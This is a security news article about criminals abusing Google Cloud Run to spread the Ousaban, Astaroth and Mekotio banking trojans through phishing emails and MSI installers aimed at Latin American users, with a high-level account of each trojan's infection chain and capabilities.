Ousaban Banking Trojan

Security experts caution that hackers are exploiting the Google Cloud Run service to disseminate large quantities of banking Trojans. Cybercriminals are utilizing various mobile malware threats, such as Ousaban, along with other banking Trojans like Astaroth and Mekotio.

The Google Cloud Run empowers users to deploy frontend and backend services, websites, or applications, managing workloads without the complexities of infrastructure management or scaling. The misuse of Google's service for malware distribution was first observed in September 2023 when Brazilian actors initiated campaigns employing MSI installer files to deploy malware payloads.

Cybercriminals Exploit Phishing Tactics to Deliver Banking Trojan Threats

The attacks commence with phishing emails directed at potential victims, skillfully designed to mimic genuine communications related to invoices, financial statements, or messages purportedly from local government and tax agencies. The researchers note that the majority of emails in this campaign are in Spanish, targeting countries in Latin America, but there are instances where Italian is used. These deceptive emails contain links that redirect users to malicious web services hosted on the Google Cloud Run.

In certain scenarios, the payload is delivered through MSI files. Alternatively, the service employs a 302 redirect to a Google Cloud Storage location, where a ZIP archive containing a threatening MSI file is stored. Upon execution of the malicious MSI files by victims, additional components and payloads are downloaded and executed on their systems. In observed cases, the second-stage payload delivery exploits the legitimate Windows tool 'BITSAdmin.'

To ensure persistence and survive reboots, the malware establishes itself on the victim's system by adding LNK files ('sysupdates.setup.lnk') in the Startup folder. These LNK files are configured to execute a PowerShell command that, in turn, runs the infection script ('AutoIT').

Compromised Devices Are Infected with Mobile Malware Targeting Victims' Financial Data

The campaigns exploiting the Google Cloud Run feature three banking Trojans: Ousaban, Astaroth and Mekotio. Each Trojan is crafted to stealthily infiltrate systems, establish persistence, and illicitly obtain sensitive financial data for unauthorized access to banking accounts.

Ousaban, a banking Trojan, possesses capabilities such as keylogging, capturing screenshots, and phishing for banking credentials through counterfeit (cloned) banking portals. Researchers observe that Ousaban is introduced at a later stage in the Astaroth infection chain, suggesting a potential collaboration between the operators of the two malware families or the involvement of a single threat actor overseeing both.

Astaroth employs advanced evasion techniques and initially focuses on Brazilian targets but has expanded its scope to over 300 financial institutions across 15 countries in Latin America. Recently, the malware has begun collecting credentials for cryptocurrency exchange services. Utilizing keylogging, screen capture, and clipboard monitoring, Astaroth not only pilfers sensitive data but also intercepts and manipulates internet traffic to capture banking credentials.

Mekotio, active for several years, concentrates on the Latin American region. Known for pilfering banking credentials and personal information and executing fraudulent transactions, Mekotio can manipulate web browsers to redirect users to phishing sites.